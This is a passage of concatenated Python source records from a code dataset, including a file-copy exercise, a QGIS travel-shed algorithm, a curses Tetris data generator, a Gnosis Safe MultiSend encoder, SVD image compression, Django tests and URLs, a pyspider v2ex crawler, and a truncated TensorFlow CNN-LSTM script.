driver\ndriver.quit()\n\n\n","sub_path":"selenium-weather-shopper/costliest-ss.py","file_name":"costliest-ss.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"346711894","text":"#LPTHW Study Drill from Ex17\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv\n\nprint(f\"Copying from {from_file} to {to_file}\")\n\n#We could do these two on one line, how?\n#in_file = open(from_file)\n#indata = in_file.read()\nindata = open(from_file).read()\n\n#If we want a simpler version, we can delete the feature in line16.\n#print(f\"The input file is {len(indata)} bytes long\")\n\nprint(f\"Does the output file exist? {exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\n#We can reuse the one-line trick from line 13 to simplify this.
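\n#The chained call opens the file, writes, and discards the file object in one\n#expression, so there is nothing left to close explicitly.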
\n#out_file = open(to_file,\"w\")\n#out_file.write(indata)\nopen(to_file,\"w\").write(indata)\n\nprint(\"Alright, all done.\")\n\n#According to www.josharcher.uk, if you open and read/write the file\n#immediately without keeping a reference, it is not necessary to close it.\n#There are more sources on this question at\n#https://stackoverflow.com/questions/36046167/is-there-a-need-to-close-files-that-have-no-reference-to-them/36063184#36063184\n#out_file.close()\n#in_file.close()","sub_path":"StudyDrills17.1.py","file_name":"StudyDrills17.1.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"611457813","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n    AccessGrid.py\n    ---------------------\n    Date                 : January 2016\n    Copyright            : (C) 2016 by Spencer Gardner\n    Email                : spencergardner at gmail dot com\n***************************************************************************\n*                                                                         *\n*   This program is free software; you can redistribute it and/or modify *\n*   it under the terms of the GNU General Public License as published by *\n*   the Free Software Foundation; either version 2 of the License, or    *\n*   (at your option) any later version.                                  *\n*                                                                         *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Spencer Gardner'\n__date__ = 'January 2016'\n__copyright__ = '(C) 2016, Spencer Gardner'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport markdown2\nfrom PyQt4.QtCore import QVariant\nfrom qgis.core import *\n\nfrom TDGAlgorithm import TDGAlgorithm\nimport processing\nfrom processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterString\nfrom processing.core.parameters import ParameterNumber\nfrom processing.core.parameters import ParameterTableField\nfrom processing.core.parameters import ParameterSelection\nfrom processing.core.outputs import OutputVector\n\nfrom processing.tools import dataobjects, vector\nfrom nxutils import NXUtils\n\nimport networkx as nx\n\nclass AccessGrid(TDGAlgorithm):\n    \"\"\"This algorithm takes an input grid with the nearest\n    network vertex identified and calculates the travel\n    shed for each cell, counting the number of cells\n    that are accessible within the shed.\n    \"\"\"\n\n    # Constants used to refer to parameters and outputs. They will be\n    # used when calling the algorithm from another algorithm, or when\n    # calling from the QGIS console.\n\n    ROADS_LAYER = 'ROADS_LAYER'\n    ORIGINS_LAYER = 'ORIGINS_LAYER'\n    ORIGIN_VERT_ID_FIELD = 'ORIGIN_VERT_ID_FIELD'\n    GRID_LAYER = 'GRID_LAYER'\n    GRID_VERT_ID_FIELD = 'GRID_VERT_ID_FIELD'\n    BUDGET = 'BUDGET'\n    STRESS = 'STRESS'\n    OUT_LAYER = 'OUT_LAYER'\n\n\n    def help(self):\n        html = markdown2.markdown_path(os.path.join(self.helpPath,'Access Grid.md'))\n        return True, html\n\n\n    def defineCharacteristics(self):\n        \"\"\"Here we define the inputs and output of the algorithm, along\n        with some other properties.\n        \"\"\"\n\n        # The name that the user will see in the toolbox\n        self.name = 'Access grid'\n\n        # The branch of the toolbox under which the algorithm will appear\n        #self.group = 'Algorithms for vector layers'\n        self.group = 'Network Analysis'\n
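\n        # Each addParameter call below registers one input in the Processing\n        # dialog; optional=False marks that input as required.\n\n        # Input roads layer. 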
Must be line type\n # It is a mandatory (not optional) one, hence the False argument\n self.addParameter(\n ParameterVector(\n self.ROADS_LAYER,\n self.tr('Roads layer (must have a network built)'),\n [ParameterVector.VECTOR_TYPE_LINE],\n optional=False\n )\n )\n\n # Input origins layer. Must be point type\n # Required\n self.addParameter(\n ParameterVector(\n self.ORIGINS_LAYER,\n self.tr('Origins layer (must have network vertex IDs)'),\n [ParameterVector.VECTOR_TYPE_POINT],\n optional=False\n )\n )\n\n # Origins field with vertex IDs\n # Required\n self.addParameter(\n ParameterTableField(\n self.ORIGIN_VERT_ID_FIELD,\n self.tr('Origin field containing the network vertex IDs'),\n parent=self.ORIGINS_LAYER,\n datatype = ParameterTableField.DATA_TYPE_NUMBER,\n optional=False\n )\n )\n\n # Input grid layer. Must be polygon type\n # Required\n self.addParameter(\n ParameterVector(\n self.GRID_LAYER,\n self.tr('Grid layer (must have vertex IDs)'),\n [ParameterVector.VECTOR_TYPE_POLYGON],\n optional=False\n )\n )\n\n # Grid field with vertex IDs\n # Required\n self.addParameter(\n ParameterTableField(\n self.GRID_VERT_ID_FIELD,\n self.tr('Grid field containing the network vertex IDs'),\n parent=self.GRID_LAYER,\n datatype = ParameterTableField.DATA_TYPE_NUMBER,\n optional=False\n )\n )\n\n # Max travel budget\n # Required\n self.addParameter(\n ParameterNumber(\n self.BUDGET,\n self.tr('Maximum travel budget (in cost units)'),\n minValue=0,\n optional=False\n )\n )\n\n # Max stress\n # Required\n self.addParameter(\n ParameterNumber(\n self.STRESS,\n self.tr('Maximum allowable traffic stress'),\n minValue=1,maxValue=4,\n optional=False\n )\n )\n\n\n # Output raw layer\n self.addOutput(\n OutputVector(self.OUT_LAYER, self.tr('Output'))\n )\n\n\n def processAlgorithm(self, progress):\n progress.setPercentage(0)\n # Retrieve the values of the parameters entered by the user\n inLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.ROADS_LAYER))\n originsLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.ORIGINS_LAYER))\n oVertIdField = self.getParameterValue(self.ORIGIN_VERT_ID_FIELD)\n gridLayer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.GRID_LAYER))\n gVertIdField = self.getParameterValue(self.GRID_VERT_ID_FIELD)\n stress = self.getParameterValue(self.STRESS)\n budget = self.getParameterValue(self.BUDGET)\n\n # build the output layer\n gridFields = QgsFields()\n gridFields.append(QgsField('id', QVariant.Int))\n gridFields.append(QgsField('origin_id', QVariant.Int))\n gridFields.append(QgsField('grid_id', QVariant.Int))\n gridFields.append(QgsField('car_cost', QVariant.Int))\n gridFields.append(QgsField('bike_cost', QVariant.Int))\n gridFields.append(QgsField('conn_idx', QVariant.Double))\n gridWriter = self.getOutputFromName(self.OUT_LAYER).getVectorWriter(\n gridFields, QGis.WKBPolygon, inLayer.crs())\n\n progress.setPercentage(2)\n\n # establish db connection\n progress.setInfo('Getting DB connection')\n self.setDbFromRoadsLayer(inLayer)\n self.setLayersFromDb()\n if self.vertsLayer is None or self.linksLayer is None:\n raise GeoAlgorithmExecutionException('Could not find related \\\n network tables. Have you built the network tables on \\\n layer %s?' 
% inLayer.name())\n        progress.setPercentage(3)\n\n        # get network\n        progress.setInfo('Building network')\n        nu = NXUtils(self.vertsLayer,self.linksLayer)\n        nu.buildNetwork()\n        DG = nu.getNetwork()\n        # if not stress:\n        #     stress = 99\n        SG = nu.getStressNetwork(stress)\n        progress.setPercentage(10)\n\n        # loop through the origin features and get distances to the grid cells for each\n        count = 0\n        totalCount = len(vector.features(originsLayer))\n        idStep = 0\n        for originFeat in vector.features(originsLayer):\n            originVertId = originFeat.attribute(oVertIdField)\n\n            # skip if node is not accessible by low stress\n            if originVertId not in SG:\n                continue\n\n            # get shortest path\n            pathsBase = nx.single_source_dijkstra_path_length(\n                DG,\n                source=originVertId,\n                cutoff=budget,\n                weight='weight'\n            )\n\n            # get shortest low stress path\n            pathsLowStress = nx.single_source_dijkstra_path_length(\n                SG,\n                source=originVertId,\n                cutoff=budget,\n                weight='weight'\n            )\n\n            # loop through grid and establish features\n            for gridFeat in vector.features(gridLayer):\n                gridVertId = gridFeat.attribute(gVertIdField)\n                if gridVertId in pathsLowStress:\n                    if gridVertId in pathsBase:\n                        carCost = pathsBase[gridVertId]\n                    else:\n                        carCost = None\n                    bikeCost = pathsLowStress[gridVertId]\n                    connIdx = float()\n                    if carCost is None:\n                        connIdx = 1\n                    elif carCost == 0:\n                        connIdx = 1\n                    else:\n                        connIdx = float(bikeCost)/float(carCost)\n                    outFeat = QgsFeature(gridFields)\n                    outFeat.setAttribute(0,idStep) #feature id\n                    outFeat.setAttribute(1,originFeat.id()) #origin_id\n                    outFeat.setAttribute(2,gridFeat.id()) #grid_id\n                    outFeat.setAttribute(3,carCost) #car_cost\n                    outFeat.setAttribute(4,bikeCost) #bike_cost\n                    outFeat.setAttribute(5,connIdx) #conn_idx\n                    outGeom = QgsGeometry(gridFeat.geometry())\n                    outFeat.setGeometry(outGeom)\n                    idStep += 1\n                    gridWriter.addFeature(outFeat)\n\n            count += 1\n            progress.setPercentage(10+int(90*float(count)/totalCount))\n\n        del gridWriter\n","sub_path":"TDGAlgorithmProviderPlugin/AccessGrid.py","file_name":"AccessGrid.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"236464239","text":"import curses\nimport time\nimport game_objects as go\nimport utils\nfrom threading import Thread\nimport cfg\n\n\nwindow = curses.initscr()\ncurses.cbreak()\ncurses.noecho()\nwindow.timeout(cfg.TIME_MOVE_SET)\n\nfield = go.Field()\nbrick = go.Brick()\n\n\ndef auto_down():\n    while True:\n        time.sleep(cfg.TIME_SLEEP)\n        global brick, field, window\n        brick.control_brick(ord(\"s\"), field)\n        can_down = utils.check_valid(field, brick)\n        if not can_down:\n            brick.revert()\n            field.add_brick(brick)\n            brick = go.Brick()\n            field.check_and_clear_rows()\n        # render screen\n        rendered = utils.create_screen(field, brick)\n        window.refresh()\n        window.addstr(0, 0, rendered)\n\n\ndef move(key):\n    global brick, field, window\n    window.clear()\n    window.refresh()\n    brick.control_brick(key, field)\n\n    # check valid move or not\n    valid = utils.check_valid(field, brick)\n    if not valid:\n        brick.revert()\n\n    # check_get floor\n    brick.control_brick(ord(\"s\"), field)\n    can_down = utils.check_valid(field, brick)\n    brick.revert()\n    if not can_down:\n        field.add_brick(brick)\n        brick.create_new_brick()\n\n    # clear one row when full\n    field.check_and_clear_rows()\n\n    # render screen\n    rendered = utils.create_screen(field, brick)\n    window.addstr(0, 0, rendered)\n\n\ndef move_set(keys_list):\n    global window\n    move(keys_list[0])\n    for key in keys_list[1:]:\n        window.getch()\n        move(key)\n\n
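\n# Main loop: block for a keypress, ask utils for a move set for the current\n# brick, record it (gen_data presumably logs the state/move pair), then replay it.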
\nwhile True:\n    window.getch()\n    keys_list = utils.get_moveset(field, brick)\n    utils.gen_data(field, brick, keys_list)\n    move_set(keys_list)\n","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"560105880","text":"from enum import Enum\nfrom logging import getLogger\nfrom typing import Any, Dict, List\n\nfrom eth_account.signers.local import LocalAccount\nfrom hexbytes import HexBytes\nfrom web3 import Web3\n\nfrom gnosis.eth import EthereumClient\nfrom gnosis.eth.contracts import get_multi_send_contract\nfrom gnosis.eth.ethereum_client import EthereumTxSent\n\nlogger = getLogger(__name__)\n\n\nclass MultiSendOperation(Enum):\n    CALL = 0\n    DELEGATE_CALL = 1\n\n\nclass MultiSendTx:\n    def __init__(self, operation: MultiSendOperation, address: str, value: int, data: bytes):\n        self.operation = operation\n        self.address = address\n        self.value = value\n        self.data = data\n\n    def __eq__(self, other):\n        if not isinstance(other, MultiSendTx):\n            return NotImplemented\n\n        return (self.operation == other.operation and self.address == other.address\n                and self.value == other.value and self.data == other.data)\n\n    @classmethod\n    def from_bytes(cls, encoded_multisend_tx: bytes):\n        operation = MultiSendOperation(encoded_multisend_tx[0])\n        address = Web3.toChecksumAddress(encoded_multisend_tx[1:1 + 20])\n        value = int.from_bytes(encoded_multisend_tx[21:21 + 32], byteorder='big')\n        # data_length = int.from_bytes(encoded_multisend_tx[21 + 32: 21 + 32 * 2], byteorder='big')\n        data = encoded_multisend_tx[21 + 32 * 2:]\n        return cls(operation, address, value, data)\n\n    @property\n    def encoded_data(self):\n        multisend_operation = HexBytes('{:0>2x}'.format(self.operation.value))  # Operation 1 byte\n        multisend_address = HexBytes('{:0>40x}'.format(int(self.address, 16)))  # Address 20 bytes\n        multisend_value = HexBytes('{:0>64x}'.format(self.value))  # Value 32 bytes\n        data_length = HexBytes('{:0>64x}'.format(len(self.data)))  # Data length 32 bytes\n        return multisend_operation + multisend_address + multisend_value + data_length + self.data\n\n\nclass MultiSend:\n    def __init__(self, address: str, ethereum_client: EthereumClient):\n        assert Web3.isChecksumAddress(address), \\\n            '%s multi send contract address not valid' % address\n\n        self.address = address\n        self.ethereum_client = ethereum_client\n        self.w3 = ethereum_client.w3\n\n    @staticmethod\n    def deploy_contract(ethereum_client: EthereumClient, deployer_account: LocalAccount) -> EthereumTxSent:\n        \"\"\"\n        Deploy multi send contract\n        :param ethereum_client:\n        :param deployer_account: Ethereum Account\n        :return: deployed contract address\n        \"\"\"\n        contract = get_multi_send_contract(ethereum_client.w3)\n        tx = contract.constructor().buildTransaction({'from': deployer_account.address})\n\n        tx_hash = ethereum_client.send_unsigned_transaction(tx, private_key=deployer_account.key)\n        tx_receipt = ethereum_client.get_transaction_receipt(tx_hash, timeout=120)\n        assert tx_receipt.status\n        contract_address = tx_receipt.contractAddress\n        logger.info(\"Deployed and initialized Multi Send Contract=%s by %s\", contract_address,\n                    deployer_account.address)\n        return EthereumTxSent(tx_hash, tx, contract_address)\n\n    def get_contract(self):\n        return get_multi_send_contract(self.ethereum_client.w3, self.address)\n\n    def build_tx_data(self, multi_send_txs: List[MultiSendTx]) -> bytes:\n        \"\"\"\n        Txs don't need to be valid to get through.\n
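        Each tx is packed as: 1-byte operation | 20-byte address | 32-byte value |\n        32-byte data length | raw data (this mirrors MultiSendTx.encoded_data above).\n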
        :param multi_send_txs: transactions to bundle into a single multiSend call\n        :return: encoded call data for the multiSend function\n        \"\"\"\n        multisig_contract = self.get_contract()\n        encoded_multisend_data = b''.join([x.encoded_data for x in multi_send_txs])\n        return multisig_contract.functions.multiSend(encoded_multisend_data).buildTransaction({'gas': 1,\n                                                                                              'gasPrice': 1})['data']\n","sub_path":"gnosis/safe/multi_send.py","file_name":"multi_send.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"158869443","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport scipy as sp\nimport scipy.linalg  # 'import scipy' alone does not load the linalg submodule\n\n# function for picture compression\ndef picture_compress(k):\n\n    # copy the singular values so earlier calls do not affect this one\n    r1 = Sigma_r.copy()\n    g1 = Sigma_g.copy()\n    b1 = Sigma_b.copy()\n\n    # zero out all singular values from index k onward\n    r1[k:800] = np.zeros_like(Sigma_r[k:800])\n    g1[k:800] = np.zeros_like(Sigma_g[k:800])\n    b1[k:800] = np.zeros_like(Sigma_b[k:800])\n\n    # rebuild full-size diagonal matrices for the matrix products\n    r2 = sp.linalg.diagsvd(r1,800,1000)\n    g2 = sp.linalg.diagsvd(g1,800,1000)\n    b2 = sp.linalg.diagsvd(b1,800,1000)\n\n    # reconstruct the rank-k approximation of each channel\n    r_new = np.dot(np.dot(U_r,r2), V_r)\n    g_new = np.dot(np.dot(U_g,g2), V_g)\n    b_new = np.dot(np.dot(U_b,b2), V_b)\n\n    # plot the image rebuilt from the new matrices\n    img[:,:,0] = r_new\n    img[:,:,1] = g_new\n    img[:,:,2] = b_new\n\n    fig2 = plt.figure(k)\n    ax1 = fig2.add_subplot(2,2,1)\n    ax2 = fig2.add_subplot(2,2,2)\n    ax3 = fig2.add_subplot(2,2,3)\n    ax4 = fig2.add_subplot(2,2,4)\n    ax1.imshow(img)\n    ax2.imshow(r, cmap = 'Reds')\n    ax3.imshow(g, cmap = 'Greens')\n    ax4.imshow(b, cmap = 'Blues')\n    plt.show()\n\n# Load picture, split into 3 matrices for red, green and blue components\n# and display the three components\nimg=mpimg.imread('chelsea.png')\n[r,g,b] = [img[:,:,i] for i in range(3)]\n\nfig = plt.figure(1)\nax1 = fig.add_subplot(2,2,1)\nax2 = fig.add_subplot(2,2,2)\nax3 = fig.add_subplot(2,2,3)\nax4 = fig.add_subplot(2,2,4)\nax1.imshow(img)\nax2.imshow(r, cmap = 'Reds')\nax3.imshow(g, cmap = 'Greens')\nax4.imshow(b, cmap = 'Blues')\nplt.show()\n\n# Sigma, U and V for reds, greens and blues\nU_r, Sigma_r, V_r = sp.linalg.svd(r)\nU_g, Sigma_g, V_g = sp.linalg.svd(g)\nU_b, Sigma_b, V_b = sp.linalg.svd(b)\n\n# Number of nonzero elements in Sigma for reds, greens and blues\nnonzero_Sigma_r = np.count_nonzero(Sigma_r)\nnonzero_Sigma_g = np.count_nonzero(Sigma_g)\nnonzero_Sigma_b = np.count_nonzero(Sigma_b)\nprint(\"The nonzero elements in Sigma are \",nonzero_Sigma_r,\" for red, \"\n      ,nonzero_Sigma_g, \" for green and \",nonzero_Sigma_b, \" for blue\")\n\n\npicture_compress(30)\n\npicture_compress(200)","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"39891255","text":"from django import test\nfrom django.contrib.auth import models as auth_models\n\nfrom api import models\n\n\nclass TestApi(test.TestCase):\n    def setUp(self):\n        super(TestApi, self).setUp()\n        self.users = [\n            auth_models.User.objects.create_user(\n                username='user1',\n                password='password1'\n            )\n        ]\n        self.messages = [\n            models.Message(\n                text='First message!',\n                author=self.users[0],\n            )\n        ]\n        for message in self.messages:\n            message.save()\n\n    def test_message_list(self):\n        resp = self.client.get('/api/v0/messages/')\n        self.assertEqual(200, resp.status_code)\n        content = resp.json()\n        self.assertIsInstance(content, list)\n
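        # the list endpoint should return exactly the messages created in setUp\n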
        self.assertEqual(len(self.messages), len(content))\n        self.assertEqual(self.messages[0].text, content[0]['text'])\n","sub_path":"api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"315035882","text":"# Function to find the minimum and maximum number in an array\ndef find_max_min(list_main):\n\n    # First, ascertain whether all elements are equal\n    if all(a == list_main[0] for a in list_main):\n        list_2 = []\n        list_2.append(len(list_main))\n\n        # Return the length of the list when every element is the same\n        return list_2\n\n    else:\n        # Find the maximum value\n        max_val = max(list_main)\n\n        # Find the minimum value\n        min_val = min(list_main)\n\n        # Combine the minimum and maximum values into a list and return it\n        max_min = []\n        max_min.append(min_val)\n        max_min.append(max_val)\n        return max_min\n","sub_path":"max_min_num.py","file_name":"max_min_num.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"589872899","text":"\"\"\"university_management_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path(\n        'api/accounts/',\n        include(\n            ('apps.accounts.urls', 'accounts'),\n            namespace='accounts'\n        )\n    ),\n    path(\n        'api/teachers/',\n        include(\n            ('apps.teachers.urls', 'teachers'),\n            namespace='teachers'\n        )\n    ),\n    path(\n        'api/regulations/',\n        include(\n            ('apps.regulations.urls', 'regulations'),\n            namespace='regulations'\n        )\n    ),\n    path(\n        'api/contents/',\n        include(\n            ('apps.contents.urls', 'contents'),\n            namespace='contents'\n        )\n    ),\n]\n\nurlpatterns += static(\n    settings.MEDIA_URL,\n    document_root=settings.MEDIA_ROOT\n)\n\nurlpatterns += static(\n    settings.STATIC_URL,\n    document_root=settings.STATIC_ROOT\n)\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"486946768","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# Created on 2017-09-06 15:52:25\n# Project: newv2ex\n\nfrom pyspider.libs.base_handler import *\n\n\nclass Handler(BaseHandler):\n    crawl_config = {\n    }\n\n    @every(minutes=24 * 60)\n    def on_start(self):\n        self.crawl('https://www.v2ex.com/', callback=self.index_page)\n\n    @config(age=10 * 24 * 60 * 60)\n    def index_page(self, response):\n        for each in response.doc('a[href^=\"https://www.v2ex.com/?tab=\"]').items():\n            self.crawl(each.attr.href, callback=self.tab_page)\n\n    @config(priority=2)\n    def tab_page(self, response):\n        return {\n            \"url\": response.url,\n            \"title\": response.doc('title').text(),\n        }\n\n    @config(priority=2)\n    def detail_page(self, response):
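\n        # mirrors tab_page: report the url and page title of each detail page\n        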
return {\n \"url\": response.url,\n \"title\": response.doc('title').text(),\n }\n","sub_path":"pySpider/v2ex.py","file_name":"v2ex.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615412855","text":"import json\nimport torch\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom transformers import BertForSequenceClassification\n\n\n# Function to read configuration file\ndef read_config_file(file):\n js = open(file).read()\n config = json.loads(js)\n\n return config\n\n\n# Function to initialize configuration for REST API\ndef initialize_api():\n config = read_config_file('config-api.json')\n label_dict = config[\"label-dict\"]\n\n return config, label_dict\n\n\n# Function to initialize system to train and test model\ndef initialize():\n config = read_config_file('config.json')\n \n # read csv and add names to columns\n df = pd.read_csv(config['csv-file'],\n dtype = str,\n header = 0, \n index_col = 'id',\n usecols = ['id', 'processed_tweet', 'emotion'])\n\n print(df.head())\n print(df.emotion.value_counts())\n\n # remove empty processed tweets\n df = df[~df.processed_tweet.isnull()]\n\n print(df.emotion.value_counts())\n print(\"TOTAL :\", len(df))\n \n # plot the dataset after the undersampling\n plt.figure(figsize=(8, 8))\n sns.countplot('emotion', data=df)\n plt.show()\n\n # enumerate categories\n possible_labels = sorted(df.emotion.unique())\n\n label_dict = {}\n for index, possible_label in enumerate(possible_labels):\n label_dict[possible_label] = index\n\n df['label'] = df.emotion.replace(label_dict)\n\n print(df.head())\n label_dict = dict(sorted(label_dict.items()))\n print(label_dict)\n \n return df, label_dict, config\n\n\n# Function to load saved pretrained model\ndef load_pretrained_model(bert, label_dict, config):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n model = BertForSequenceClassification.from_pretrained(config[\"bert-model\"][bert],\n num_labels = len(label_dict),\n output_attentions = False,\n output_hidden_states = False)\n\n model.to(device)\n model.load_state_dict(torch.load(config[\"model\"][bert], map_location=torch.device('cpu')))\n\n return model\n\n\n# Function to load model for the REST API\ndef load_model(bert):\n config, label_dict = initialize_api()\n loaded_model = load_pretrained_model(bert, label_dict, config)\n return loaded_model, config, label_dict","sub_path":"Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201104772","text":"\nfrom __future__ import print_function\n\nimport sys\nimport cv2\n\nimport tensorflow as tf\nfrom tensorflow.python.ops import rnn, rnn_cell\n#from tensorflow.contrib import rnn\n#from tensorflow.contrib.rnn.python.ops import core_rnn\n\nimport numpy as np\n\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\nnp.random.seed(2323)\n\nexp = 43\n\nTRAIN_SIZE = 1000\nTEST_SIZE = 200\nNUM_MAX = int((TRAIN_SIZE+TEST_SIZE)/TEST_SIZE)\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('dataset', '../screenshot/scsho_txt/rnn'+str(43)+'.txt', 'File name of data dir')\n\n# Parameters\nlearning_rate = 0.0001\n\nmax_epoch = 1000\nbatch_size = 20\n\nCALC_BATCH = 100\n\nSAVE_MODEL_STEP = 100\n\n\nn_input_row = 48 \nn_input_col = 48\nn_steps = 10\n\n#CNN\nn_fc1 = 1024\nn_fc2 = 256\n\nn_hidden = 128 # hidden 
layer num of features\n\nn_classes = 2 # two regression targets: the (x, y) position\n\nimages_placeholder = tf.placeholder(\"float\", [None, n_steps, n_input_row*n_input_col*3])\nlabels_placeholder = tf.placeholder(\"float\", [None, n_steps, n_classes])\n\n\n# Initialize weights from a truncated normal distribution with stddev 0.1\ndef weight_variable(shape):\n    initial = tf.truncated_normal(shape, stddev=0.1)\n    return tf.Variable(initial)\n\n# Initialize biases to the constant 0.1\ndef bias_variable(shape):\n    initial = tf.constant(0.1, shape=shape)\n    return tf.Variable(initial)\n\n\n#CNN\n# Define weights\nweights = {\n    #CNN\n    'W_conv1': weight_variable([5, 5, 3, 32]),\n    'W_conv2': weight_variable([5, 5, 32, 64]),\n    'W_fc1': weight_variable([int(n_input_row/4*n_input_col/4*64), n_fc1]),\n    'out': weight_variable([n_hidden, n_classes])\n}\n\nbiases = {\n    #CNN\n    'b_conv1': bias_variable([32]),\n    'b_conv2': bias_variable([64]),\n    'b_fc1': bias_variable([n_fc1]),\n    'out': bias_variable([n_classes])\n}\n\ndef LRCN(images_placeholder, weights, biases, keep_prob1, keep_prob2, keep_prob3, keep_prob4, keep_prob5, keep_prob6, keep_prob7):\n    # Prepare data shape to match `rnn` function requirements\n    # Current data input shape: (batch_size, n_steps, n_input)\n    # Required shape: 'n_steps' tensors list of shape (batch_size, n_input)\n\n    # Permuting batch_size and n_steps\n    images_placeholder = tf.transpose(images_placeholder, [1, 0, 2])\n    # Reshaping to (n_steps*batch_size, n_input)\n    images_placeholder = tf.reshape(images_placeholder, [-1, n_input_row*n_input_col*3])\n    # Split to get a list of 'n_steps' tensors of shape (batch_size, n_input)\n    #images_placeholder = tf.split(0, n_steps, images_placeholder)\n    images_placeholder = tf.split(images_placeholder, n_steps, 0)\n\n\n    #CNN\n\n    # Build a convolution layer\n    def conv2d(x, W):\n        return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n    # Build a max pooling layer\n    def max_pool_2x2(x):\n        return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],strides=[1, 2, 2, 1], padding='SAME')\n\n    lstm_input = []\n\n    for time_step in range(n_steps):\n        # Reshape the input to n_input_row x n_input_col x 3\n        x_image = tf.reshape(images_placeholder[time_step], [-1, n_input_row, n_input_col, 3])\n\n        # Convolution layer 1\n        with tf.name_scope('conv1') as scope:\n            x_image_drop = tf.nn.dropout(x_image, keep_prob1)\n            h_conv1 = tf.nn.relu(conv2d(x_image_drop, weights['W_conv1']) + biases['b_conv1'])\n\n        # Pooling layer 1\n        with tf.name_scope('pool1') as scope:\n            h_conv1_drop = tf.nn.dropout(h_conv1, keep_prob2)\n            h_pool1 = max_pool_2x2(h_conv1_drop)\n\n        # Convolution layer 2\n        with tf.name_scope('conv2') as scope:\n            h_pool1_drop = tf.nn.dropout(h_pool1, keep_prob3)\n            h_conv2 = tf.nn.relu(conv2d(h_pool1_drop, weights['W_conv2']) + biases['b_conv2'])\n\n        # Pooling layer 2\n        with tf.name_scope('pool2') as scope:\n            h_conv2_drop = tf.nn.dropout(h_conv2, keep_prob4)\n            h_pool2 = max_pool_2x2(h_conv2_drop)\n\n        # Fully connected layer 1\n        with tf.name_scope('fc1') as scope:\n            h_pool2_flat = tf.reshape(h_pool2, [-1,int(n_input_row/4*n_input_col/4*64)])\n            h_pool2_flat_drop = tf.nn.dropout(h_pool2_flat,keep_prob5)\n            h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat_drop, weights['W_fc1']) + biases['b_fc1'])\n            h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob6)\n\n        lstm_input.append(h_fc1_drop)\n\n\n    #RNN\n\n    # Define a lstm cell with tensorflow\n    lstm_cell = rnn_cell.BasicLSTMCell(n_hidden, forget_bias=1.0)\n    #lstm_cell = rnn.BasicLSTMCell(n_hidden)\n\n    # Get lstm cell output\n    #outputs, states = rnn.rnn(lstm_cell, lstm_input, dtype=tf.float32)\n    outputs, states = rnn.static_rnn(lstm_cell, lstm_input, dtype=tf.float32)\n\n    # Linear activation (one output per time step)\n    out = []\n
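    # each step projects the n_hidden-dim LSTM output onto the n_classes position targets via weights['out']\n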
